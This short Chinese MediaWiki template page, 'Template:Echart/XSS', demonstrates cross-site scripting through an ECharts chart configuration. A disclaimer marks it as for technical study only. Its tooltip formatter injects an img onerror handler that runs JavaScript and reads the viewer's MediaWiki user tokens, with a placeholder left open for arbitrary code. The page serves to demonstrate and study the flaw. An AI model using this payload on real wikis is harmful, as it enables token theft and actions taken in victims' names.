Template:Echart/XSS
跳到导航
跳到搜索
模板文档 [编辑]
这个文档是内联文档。
- 仅供技术学习与交流使用,禁止使用该页面所示的应用例进行非法网络攻击,违者或将被追究相关责任。
- 返回到模板:Echart
{
"xAxis": { "type": "category", "boundaryGap": false, "data": [ "鼠标指到上面的矩形看看" ] }, "yAxis": { "type": "value" }, "series": [ { "data": [ 1000 ], "type": "bar" } ], "tooltip": { "formatter": "\u003Cimg src='https://example.com/abcd' onerror='/* your code here */ $(\".echart-main\").after(JSON.stringify(mw.user.tokens.values));'\u003E", "renderMode": "html" }}